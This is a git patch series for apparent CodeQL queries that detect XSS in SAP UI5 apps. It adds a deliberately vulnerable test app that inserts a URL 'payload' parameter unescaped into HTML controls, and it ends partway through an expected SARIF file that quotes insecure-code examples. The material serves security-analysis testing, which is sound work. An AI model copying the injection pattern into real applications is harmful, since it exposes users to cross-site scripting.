diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/UI5Xss.qlref b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/UI5Xss.qlref
new file mode 100644
index 000000000..62c4ce84c
--- /dev/null
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/UI5Xss.qlref
@@ -0,0 +1 @@
+UI5Xss/UI5Xss.ql
diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/package.json b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/package.json
new file mode 100644
index 000000000..0f76dd067
--- /dev/null
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/package.json
@@ -0,0 +1,4 @@
+{
+  "name": "ui5-xss-urlparams-jsonmodel",
+  "version": "1.0.0"
+}
diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/ui5.yaml b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/ui5.yaml
new file mode 100644
index 000000000..ec42d0a3a
--- /dev/null
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/ui5.yaml
@@ -0,0 +1,4 @@
+specVersion: "3.0"
+metadata:
+  name: ui5-xss-urlparams-jsonmodel
+type: application
diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/controller/Display.controller.js b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/controller/Display.controller.js
new file mode 100644
index 000000000..52ab6a26e
--- /dev/null
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/controller/Display.controller.js
@@ -0,0 +1,33 @@
+sap.ui.define([
+    "sap/ui/core/mvc/Controller",
+    "sap/ui/model/json/JSONModel",
+    "sap/ui/core/HTML",
+    "sap/ui/core/Fragment"
+], function (Controller, JSONModel, HTML, Fragment) {
+    "use strict";
+    return Controller.extend("ui5-xss-urlparams-jsonmodel.controller.Display", {
+        onInit: function () {
+            var oUrlQuery = new URLSearchParams(window.location.search);
+            var sRemotePayload = oUrlQuery.get("payload");
+            
+            // Test 1: Direct sink in onInit - tests if URLSearchParams.get() is detected as source
+            var oDirectHtml = new HTML({ content: "<div>" + sRemotePayload + "</div>" });
+            this.getView().addContent(oDirectHtml);
+            
+            // Test 2: Flow through JSONModel to View XML binding
+            var oViewModel = new JSONModel({
+                remotePayload: sRemotePayload
+            });
+            this.getView().setModel(oViewModel);
+            
+            // Test 3: Flow through JSONModel to Fragment XML binding (mirrors app6c pattern)
+            Fragment.load({
+                id: this.getView().getId(),
+                name: "ui5-xss-urlparams-jsonmodel.fragments.Content",
+                controller: this
+            }).then(function (oFragment) {
+                this.byId("page").addContent(oFragment);
+            }.bind(this));
+        }
+    });
+});
diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/fragments/Content.fragment.xml b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/fragments/Content.fragment.xml
new file mode 100644
index 000000000..b63fb4c3b
--- /dev/null
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/fragments/Content.fragment.xml
@@ -0,0 +1,9 @@
+<core:FragmentDefinition
+    xmlns="sap.m"
+    xmlns:core="sap.ui.core">
+    <VBox class="sapUiSmallMargin">
+        <Label text="Message from URL:" />
+        <!-- XSS sink: HTML content bound to user-controlled model property -->
+        <core:HTML content="{/remotePayload}" />
+    </VBox>
+</core:FragmentDefinition>
diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/index.html b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/index.html
new file mode 100644
index 000000000..5ba0e8c22
--- /dev/null
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/index.html
@@ -0,0 +1,16 @@
+<!DOCTYPE html>
+<html>
+<head>
+    <meta charset="utf-8">
+    <title>UI5 XSS URLSearchParams JSONModel Test</title>
+    <script src="https://sdk.openui5.org/resources/sap-ui-core.js" 
+        data-sap-ui-libs="sap.m"
+        data-sap-ui-onInit="module:ui5-xss-urlparams-jsonmodel/index" 
+        data-sap-ui-resourceroots='{
+            "ui5-xss-urlparams-jsonmodel": "./"
+        }'>
+    </script>
+</head>
+<body class="sapUiBody" id="content">
+</body>
+</html>
diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/index.js b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/index.js
new file mode 100644
index 000000000..821ed47bf
--- /dev/null
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/index.js
@@ -0,0 +1,10 @@
+sap.ui.define([
+    "sap/ui/core/mvc/XMLView"
+], function (XMLView) {
+    "use strict";
+    XMLView.create({
+        viewName: "ui5-xss-urlparams-jsonmodel.view.Display"
+    }).then(function (oView) {
+        oView.placeAt("content");
+    });
+});
diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/manifest.json b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/manifest.json
new file mode 100644
index 000000000..b7be2336f
--- /dev/null
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/manifest.json
@@ -0,0 +1,5 @@
+{
+    "sap.app": {
+        "id": "ui5-xss-urlparams-jsonmodel"
+    }
+}
diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/view/Display.view.xml b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/view/Display.view.xml
new file mode 100644
index 000000000..2ae780683
--- /dev/null
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/view/Display.view.xml
@@ -0,0 +1,9 @@
+<mvc:View xmlns:mvc="sap.ui.core.mvc" xmlns:core="sap.ui.core" xmlns="sap.m"
+    controllerName="ui5-xss-urlparams-jsonmodel.controller.Display">
+    <App id="app">
+        <Page id="page" title="URLSearchParams JSONModel Test">
+            <!-- Test 2 sink: Model binding in View -->
+            <core:HTML content="{/remotePayload}" />
+        </Page>
+    </App>
+</mvc:View>

From 4be732a5d468e8d572808360bea127d16f63530b Mon Sep 17 00:00:00 2001
From: Kristen Newbury <knewbury01@github.com>
Date: Mon, 5 Jan 2026 13:35:03 -0500
Subject: [PATCH 07/15] Fix syntax error in testcases for fragments

---
 .../xss-xml-fragment-load/webapp/controller/app.controller.js   | 2 +-
 .../UI5Xss/xss-xml-fragment/webapp/controller/app.controller.js | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/controller/app.controller.js b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/controller/app.controller.js
index 5c5ca3d72..49e702081 100644
--- a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/controller/app.controller.js
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/controller/app.controller.js
@@ -3,7 +3,7 @@ sap.ui.define([
     "sap/ui/model/json/JSONModel",
     "sap/ui/core/Fragment"
 ], function (Controller, JSONModel, Fragment) {
-    "use strict"
+    "use strict";
     return Controller.extend("codeql-sap-js.controller.app", {
         onInit: function () {
             var oData = {
diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/controller/app.controller.js b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/controller/app.controller.js
index db7b40f1f..24c59166f 100644
--- a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/controller/app.controller.js
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/controller/app.controller.js
@@ -2,7 +2,7 @@ sap.ui.define([
     "sap/ui/core/mvc/Controller",
     "sap/ui/model/json/JSONModel"
 ], function (Controller, JSONModel) {
-    "use strict"
+    "use strict";
     return Controller.extend("codeql-sap-js.controller.app", {
         onInit: function () {
             var oData = {

From 8b2be19960486fc1cff2683043beeb39031e4a5d Mon Sep 17 00:00:00 2001
From: Kristen Newbury <knewbury01@github.com>
Date: Mon, 5 Jan 2026 13:41:40 -0500
Subject: [PATCH 08/15] Fix sytnax fragment testcases

---
 .../xss-xml-fragment-load/webapp/controller/app.controller.js   | 2 +-
 .../UI5Xss/xss-xml-fragment/webapp/controller/app.controller.js | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/controller/app.controller.js b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/controller/app.controller.js
index 49e702081..ddc64a34b 100644
--- a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/controller/app.controller.js
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/controller/app.controller.js
@@ -22,4 +22,4 @@ sap.ui.define([
             }.bind(this));
         }
     });
-})
\ No newline at end of file
+});
\ No newline at end of file
diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/controller/app.controller.js b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/controller/app.controller.js
index 24c59166f..496f713e2 100644
--- a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/controller/app.controller.js
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/controller/app.controller.js
@@ -18,4 +18,4 @@ sap.ui.define([
             }.bind(this));
         }
     });
-})
\ No newline at end of file
+});
\ No newline at end of file

From e75912c7f3a8c502a1c58c1058e709ec90f1aba6 Mon Sep 17 00:00:00 2001
From: Nathan Randall <data-douser@github.com>
Date: Tue, 6 Jan 2026 15:06:50 -0700
Subject: [PATCH 09/15] Cleanup UI5 & RemoteFlowSources qll

---
 .../frameworks/ui5/RemoteFlowSources.qll      | 19 -------------------
 .../javascript/frameworks/ui5/UI5.qll         |  1 -
 2 files changed, 20 deletions(-)

diff --git a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/RemoteFlowSources.qll b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/RemoteFlowSources.qll
index 54ac667ed..b12dcf430 100644
--- a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/RemoteFlowSources.qll
+++ b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/RemoteFlowSources.qll
@@ -173,22 +173,3 @@ private class UI5ExtRemoteSource extends RemoteFlowSource {
     result = "Remote flow" // Don't discriminate between UI5-specific remote flows and vanilla ones
   }
 }
-
-/**
- * URLSearchParams.get() and getAll() return URL query parameter values which are user-controlled.
- * e.g., `new URLSearchParams(window.location.search).get("param")`
- */
-private class UrlSearchParamsSource extends RemoteFlowSource {
-  UrlSearchParamsSource() {
-    exists(DataFlow::NewNode newCall, DataFlow::MethodCallNode getCall |
-      // Match: new URLSearchParams(...)
-      newCall.getCalleeName() = "URLSearchParams" and
-      // Match: .get() or .getAll() on the URLSearchParams instance
-      getCall.getMethodName() = ["get", "getAll"] and
-      newCall.flowsTo(getCall.getReceiver()) and
-      this = getCall
-    )
-  }
-
-  override string getSourceType() { result = "URL query parameter" }
-}
diff --git a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5.qll b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5.qll
index 954e587b5..cfdc2cbd5 100644
--- a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5.qll
+++ b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5.qll
@@ -358,7 +358,6 @@ class ControlReference extends Reference {
     // Fragment.byId(viewId, controlId) - static method with 2 arguments
     this.getNumArgument() = 2 and
     this.getArgument(1).getALocalSource().getStringValue() = controlId and
-    this.getMethodName() = "byId" and
     exists(FragmentModule fragment | this = fragment.getAMemberCall("byId"))
   }
 

From 56ab4329a393f88882f43e4befa3f42c9d2355a9 Mon Sep 17 00:00:00 2001
From: Nathan Randall <data-douser@github.com>
Date: Tue, 6 Jan 2026 15:13:07 -0700
Subject: [PATCH 10/15] Cleanup xss-urlparams-jsonmodel query test

---
 .../webapp/controller/Display.controller.js                     | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/controller/Display.controller.js b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/controller/Display.controller.js
index 52ab6a26e..743dfc454 100644
--- a/javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/controller/Display.controller.js
+++ b/javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/controller/Display.controller.js
@@ -20,7 +20,7 @@ sap.ui.define([
             });
             this.getView().setModel(oViewModel);
             
-            // Test 3: Flow through JSONModel to Fragment XML binding (mirrors app6c pattern)
+            // Test 3: Flow through JSONModel to Fragment XML binding
             Fragment.load({
                 id: this.getView().getId(),
                 name: "ui5-xss-urlparams-jsonmodel.fragments.Content",

From 255b3ca6b0edf8401ca2f8345fd61c1fac21d370 Mon Sep 17 00:00:00 2001
From: Nathan Randall <data-douser@github.com>
Date: Thu, 8 Jan 2026 09:59:58 -0700
Subject: [PATCH 11/15] Add comment to FragmentModule class def

---
 .../lib/advanced_security/javascript/frameworks/ui5/UI5.qll    | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5.qll b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5.qll
index cfdc2cbd5..27c3d7892 100644
--- a/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5.qll
+++ b/javascript/frameworks/ui5/lib/advanced_security/javascript/frameworks/ui5/UI5.qll
@@ -146,6 +146,9 @@ class SapUiCore extends MethodCallNode {
 /**
  * A reference to the Fragment module (`sap/ui/core/Fragment`).
  * Used for static methods like `Fragment.byId(viewId, controlId)`.
+ *
+ * Use of `DataFlow::moduleImport` may not cover byId references
+ * coming from sources with es6 style imports of Fragments.
  */
 class FragmentModule extends DataFlow::SourceNode {
   FragmentModule() { this = DataFlow::moduleImport("sap/ui/core/Fragment") }

From e66d3d8ef2f0db4580835877f4b2b85823998a3d Mon Sep 17 00:00:00 2001
From: Kristen Newbury <knewbury01@github.com>
Date: Thu, 8 Jan 2026 13:48:12 -0500
Subject: [PATCH 12/15] Update expected js sarif for scan

and change htmlsink def to updated one
---
 .github/workflows/javascript.sarif.expected   |  2 +-
 .../javascript/frameworks/ui5/Fragment.qll    |  2 +-
 .../javascript/frameworks/ui5/UI5View.qll     | 22 +------------------
 3 files changed, 3 insertions(+), 23 deletions(-)

diff --git a/.github/workflows/javascript.sarif.expected b/.github/workflows/javascript.sarif.expected
index caedb65e1..a24fa0911 100644
--- a/.github/workflows/javascript.sarif.expected
+++ b/.github/workflows/javascript.sarif.expected
@@ -1 +1 @@
-{"$schema":"https://json.schemastore.org/sarif-2.1.0.json","version":"2.1.0","runs":[{"tool":{"driver":{"name":"CodeQL","organization":"GitHub","semanticVersion":"2.23.8","notifications":[{"id":"cli/expected-extracted-files/javascript","name":"cli/expected-extracted-files/javascript","shortDescription":{"text":"Expected extracted files"},"fullDescription":{"text":"Files appearing in the source archive that are expected to be extracted."},"defaultConfiguration":{"enabled":true},"properties":{"tags":["expected-extracted-files","telemetry"],"languageDisplayName":"JavaScript"}},{"id":"cli/expected-extracted-files/actions","name":"cli/expected-extracted-files/actions","shortDescription":{"text":"Expected extracted files"},"fullDescription":{"text":"Files appearing in the source archive that are expected to be extracted."},"defaultConfiguration":{"enabled":true},"properties":{"tags":["expected-extracted-files","telemetry"],"languageDisplayName":"GitHub Actions"}},{"id":"cli/expected-extracted-files/typescript","name":"cli/expected-extracted-files/typescript","shortDescription":{"text":"Expected extracted files"},"fullDescription":{"text":"Files appearing in the source archive that are expected to be extracted."},"defaultConfiguration":{"enabled":true},"properties":{"tags":["expected-extracted-files","telemetry"],"languageDisplayName":"TypeScript"}},{"id":"cli/expected-extracted-files/python","name":"cli/expected-extracted-files/python","shortDescription":{"text":"Expected extracted files"},"fullDescription":{"text":"Files appearing in the source archive that are expected to be extracted."},"defaultConfiguration":{"enabled":true},"properties":{"tags":["expected-extracted-files","telemetry"],"languageDisplayName":"Python"}},{"id":"cli/platform","name":"cli/platform","shortDescription":{"text":"Platform"},"fullDescription":{"text":"Platform"},"defaultConfiguration":{"enabled":true}},{"id":"codeql-action/bundle-download-telemetry","name":"codeql-action/bundle-download-telemetry","shortDescription":{"text":"CodeQL bundle download telemetry"},"fullDescription":{"text":"CodeQL bundle download telemetry"},"defaultConfiguration":{"enabled":true}}],"rules":[]},"extensions":[{"name":"generated/extension-pack","semanticVersion":"0.0.0","locations":[{"uri":"file:///home/runner/work/_temp/codeql-database/javascript/temp/extension-pack/","description":{"text":"The QL pack root directory."},"properties":{"tags":["CodeQL/LocalPackRoot"]}},{"uri":"file:///home/runner/work/_temp/codeql-database/javascript/temp/extension-pack/codeql-pack.yml","description":{"text":"The QL pack definition file."},"properties":{"tags":["CodeQL/LocalPackDefinitionFile"]}}],"properties":{"isCodeQLModelPack":true}},{"name":"codeql/javascript-queries","semanticVersion":"2.2.3+28b6aa8616a393ebb45186e3ba4df004a0f3ef4e","notifications":[{"id":"js/diagnostics/successfully-extracted-files","name":"js/diagnostics/successfully-extracted-files","shortDescription":{"text":"Extracted files"},"fullDescription":{"text":"Lists all files in the source code directory that were extracted."},"defaultConfiguration":{"enabled":true},"properties":{"tags":["successfully-extracted-files"],"description":"Lists all files in the source code directory that were extracted.","id":"js/diagnostics/successfully-extracted-files","kind":"diagnostic","name":"Extracted files"}},{"id":"js/diagnostics/extraction-errors","name":"js/diagnostics/extraction-errors","shortDescription":{"text":"Extraction errors"},"fullDescription":{"text":"List all extraction errors for files in the source code directory."},"defaultConfiguration":{"enabled":true},"properties":{"description":"List all extraction errors for files in the source code directory.","id":"js/diagnostics/extraction-errors","kind":"diagnostic","name":"Extraction errors"}}],"rules":[{"id":"js/clear-text-logging","name":"js/clear-text-logging","shortDescription":{"text":"Clear-text logging of sensitive information"},"fullDescription":{"text":"Logging sensitive information without encryption or hashing can expose it to an attacker."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Clear-text logging of sensitive information\nIf sensitive data is written to a log entry it could be exposed to an attacker who gains access to the logs.\n\nPotential attackers can obtain sensitive user data when the log output is displayed. Additionally that data may expose system information such as full path names, system information, and sometimes usernames and passwords.\n\n\n## Recommendation\nSensitive data should not be logged.\n\n\n## Example\nIn the example the entire process environment is logged using \\`console.info\\`. Regular users of the production deployed application should not have access to this much information about the environment configuration.\n\n\n```javascript\n// BAD: Logging cleartext sensitive data\nconsole.info(`[INFO] Environment: ${JSON.stringify(process.env)}`);\n\n```\nIn the second example the data that is logged is not sensitive.\n\n\n```javascript\nlet not_sensitive_data = { a: 1, b : 2} \n// GOOD: it is fine to log data that is not sensitive\nconsole.info(`[INFO] Some object contains: ${JSON.stringify(not_sensitive_data)}`);\n```\n\n## References\n* OWASP: [Insertion of Sensitive Information into Log File](https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n* Common Weakness Enumeration: [CWE-532](https://cwe.mitre.org/data/definitions/532.html).\n","markdown":"# Clear-text logging of sensitive information\nIf sensitive data is written to a log entry it could be exposed to an attacker who gains access to the logs.\n\nPotential attackers can obtain sensitive user data when the log output is displayed. Additionally that data may expose system information such as full path names, system information, and sometimes usernames and passwords.\n\n\n## Recommendation\nSensitive data should not be logged.\n\n\n## Example\nIn the example the entire process environment is logged using \\`console.info\\`. Regular users of the production deployed application should not have access to this much information about the environment configuration.\n\n\n```javascript\n// BAD: Logging cleartext sensitive data\nconsole.info(`[INFO] Environment: ${JSON.stringify(process.env)}`);\n\n```\nIn the second example the data that is logged is not sensitive.\n\n\n```javascript\nlet not_sensitive_data = { a: 1, b : 2} \n// GOOD: it is fine to log data that is not sensitive\nconsole.info(`[INFO] Some object contains: ${JSON.stringify(not_sensitive_data)}`);\n```\n\n## References\n* OWASP: [Insertion of Sensitive Information into Log File](https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n* Common Weakness Enumeration: [CWE-532](https://cwe.mitre.org/data/definitions/532.html).\n"},"properties":{"tags":["security","external/cwe/cwe-312","external/cwe/cwe-359","external/cwe/cwe-532"],"description":"Logging sensitive information without encryption or hashing can\n              expose it to an attacker.","id":"js/clear-text-logging","kind":"path-problem","name":"Clear-text logging of sensitive information","precision":"high","problem.severity":"error","security-severity":"7.5"}},{"id":"js/clear-text-storage-of-sensitive-data","name":"js/clear-text-storage-of-sensitive-data","shortDescription":{"text":"Clear text storage of sensitive information"},"fullDescription":{"text":"Sensitive information stored without encryption or hashing can expose it to an attacker."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Clear text storage of sensitive information\nSensitive information that is stored unencrypted is accessible to an attacker who gains access to the storage. This is particularly important for cookies, which are stored on the machine of the end-user.\n\n\n## Recommendation\nEnsure that sensitive information is always encrypted before being stored. If possible, avoid placing sensitive information in cookies altogether. Instead, prefer storing, in the cookie, a key that can be used to look up the sensitive information.\n\nIn general, decrypt sensitive information only at the point where it is necessary for it to be used in cleartext.\n\nBe aware that external processes often store the `standard out` and `standard error` streams of the application, causing logged sensitive information to be stored as well.\n\n\n## Example\nThe following example code stores user credentials (in this case, their password) in a cookie in plain text:\n\n\n```javascript\nvar express = require('express');\n\nvar app = express();\napp.get('/remember-password', function (req, res) {\n  let pw = req.param(\"current_password\");\n  // BAD: Setting a cookie value with cleartext sensitive data.\n  res.cookie(\"password\", pw);\n});\n\n```\nInstead, the credentials should be encrypted, for instance by using the Node.js `crypto` module:\n\n\n```javascript\nvar express = require('express');\nvar crypto = require('crypto'),\n    password = getPassword();\n\nfunction encrypt(text){\n  var cipher = crypto.createCipher('aes-256-ctr', password);\n  return cipher.update(text, 'utf8', 'hex') + cipher.final('hex');\n}\n\nvar app = express();\napp.get('/remember-password', function (req, res) {\n  let pw = req.param(\"current_password\");\n  // GOOD: Encoding the value before setting it.\n  res.cookie(\"password\", encrypt(pw));\n});\n\n```\n\n## References\n* M. Dowd, J. McDonald and J. Schuhm, *The Art of Software Security Assessment*, 1st Edition, Chapter 2 - 'Common Vulnerabilities of Encryption', p. 43. Addison Wesley, 2006.\n* M. Howard and D. LeBlanc, *Writing Secure Code*, 2nd Edition, Chapter 9 - 'Protecting Secret Data', p. 299. Microsoft, 2002.\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-315](https://cwe.mitre.org/data/definitions/315.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n","markdown":"# Clear text storage of sensitive information\nSensitive information that is stored unencrypted is accessible to an attacker who gains access to the storage. This is particularly important for cookies, which are stored on the machine of the end-user.\n\n\n## Recommendation\nEnsure that sensitive information is always encrypted before being stored. If possible, avoid placing sensitive information in cookies altogether. Instead, prefer storing, in the cookie, a key that can be used to look up the sensitive information.\n\nIn general, decrypt sensitive information only at the point where it is necessary for it to be used in cleartext.\n\nBe aware that external processes often store the `standard out` and `standard error` streams of the application, causing logged sensitive information to be stored as well.\n\n\n## Example\nThe following example code stores user credentials (in this case, their password) in a cookie in plain text:\n\n\n```javascript\nvar express = require('express');\n\nvar app = express();\napp.get('/remember-password', function (req, res) {\n  let pw = req.param(\"current_password\");\n  // BAD: Setting a cookie value with cleartext sensitive data.\n  res.cookie(\"password\", pw);\n});\n\n```\nInstead, the credentials should be encrypted, for instance by using the Node.js `crypto` module:\n\n\n```javascript\nvar express = require('express');\nvar crypto = require('crypto'),\n    password = getPassword();\n\nfunction encrypt(text){\n  var cipher = crypto.createCipher('aes-256-ctr', password);\n  return cipher.update(text, 'utf8', 'hex') + cipher.final('hex');\n}\n\nvar app = express();\napp.get('/remember-password', function (req, res) {\n  let pw = req.param(\"current_password\");\n  // GOOD: Encoding the value before setting it.\n  res.cookie(\"password\", encrypt(pw));\n});\n\n```\n\n## References\n* M. Dowd, J. McDonald and J. Schuhm, *The Art of Software Security Assessment*, 1st Edition, Chapter 2 - 'Common Vulnerabilities of Encryption', p. 43. Addison Wesley, 2006.\n* M. Howard and D. LeBlanc, *Writing Secure Code*, 2nd Edition, Chapter 9 - 'Protecting Secret Data', p. 299. Microsoft, 2002.\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-315](https://cwe.mitre.org/data/definitions/315.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n"},"properties":{"tags":["security","external/cwe/cwe-312","external/cwe/cwe-315","external/cwe/cwe-359"],"description":"Sensitive information stored without encryption or hashing can expose it to an\n              attacker.","id":"js/clear-text-storage-of-sensitive-data","kind":"path-problem","name":"Clear text storage of sensitive information","precision":"high","problem.severity":"error","security-severity":"7.5"}},{"id":"js/build-artifact-leak","name":"js/build-artifact-leak","shortDescription":{"text":"Storage of sensitive information in build artifact"},"fullDescription":{"text":"Including sensitive information in a build artifact can expose it to an attacker."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Storage of sensitive information in build artifact\nSensitive information included in a build artifact can allow an attacker to access the sensitive information if the artifact is published.\n\n\n## Recommendation\nOnly store information that is meant to be publicly available in a build artifact.\n\n\n## Example\nThe following example creates a `webpack` configuration that inserts all environment variables from the host into the build artifact:\n\n\n```javascript\nconst webpack = require(\"webpack\");\n\nmodule.exports = [{\n    plugins: [\n        new webpack.DefinePlugin({\n            \"process.env\": JSON.stringify(process.env)\n        })\n    ]\n}];\n```\nThe environment variables might include API keys or other sensitive information, and the build-system should instead insert only the environment variables that are supposed to be public.\n\nThe issue has been fixed below, where only the `DEBUG` environment variable is inserted into the artifact.\n\n\n```javascript\nconst webpack = require(\"webpack\");\n\nmodule.exports = [{\n    plugins: [\n        new webpack.DefinePlugin({\n            'process.env': JSON.stringify({ DEBUG: process.env.DEBUG })\n        })\n    ]\n}];\n\n```\n\n## References\n* webpack: [DefinePlugin API](https://webpack.js.org/plugins/define-plugin/).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-315](https://cwe.mitre.org/data/definitions/315.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n","markdown":"# Storage of sensitive information in build artifact\nSensitive information included in a build artifact can allow an attacker to access the sensitive information if the artifact is published.\n\n\n## Recommendation\nOnly store information that is meant to be publicly available in a build artifact.\n\n\n## Example\nThe following example creates a `webpack` configuration that inserts all environment variables from the host into the build artifact:\n\n\n```javascript\nconst webpack = require(\"webpack\");\n\nmodule.exports = [{\n    plugins: [\n        new webpack.DefinePlugin({\n            \"process.env\": JSON.stringify(process.env)\n        })\n    ]\n}];\n```\nThe environment variables might include API keys or other sensitive information, and the build-system should instead insert only the environment variables that are supposed to be public.\n\nThe issue has been fixed below, where only the `DEBUG` environment variable is inserted into the artifact.\n\n\n```javascript\nconst webpack = require(\"webpack\");\n\nmodule.exports = [{\n    plugins: [\n        new webpack.DefinePlugin({\n            'process.env': JSON.stringify({ DEBUG: process.env.DEBUG })\n        })\n    ]\n}];\n\n```\n\n## References\n* webpack: [DefinePlugin API](https://webpack.js.org/plugins/define-plugin/).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-315](https://cwe.mitre.org/data/definitions/315.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n"},"properties":{"tags":["security","external/cwe/cwe-312","external/cwe/cwe-315","external/cwe/cwe-359"],"description":"Including sensitive information in a build artifact can\n              expose it to an attacker.","id":"js/build-artifact-leak","kind":"path-problem","name":"Storage of sensitive information in build artifact","precision":"high","problem.severity":"error","security-severity":"7.5"}},{"id":"js/incorrect-suffix-check","name":"js/incorrect-suffix-check","shortDescription":{"text":"Incorrect suffix check"},"fullDescription":{"text":"Using indexOf to implement endsWith functionality is error-prone if the -1 case is not explicitly handled."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Incorrect suffix check\nThe `indexOf` and `lastIndexOf` methods are sometimes used to check if a substring occurs at a certain position in a string. However, if the returned index is compared to an expression that might evaluate to -1, the check may pass in some cases where the substring was not found at all.\n\nSpecifically, this can easily happen when implementing `endsWith` using `indexOf`.\n\n\n## Recommendation\nUse `String.prototype.endsWith` if it is available. Otherwise, explicitly handle the -1 case, either by checking the relative 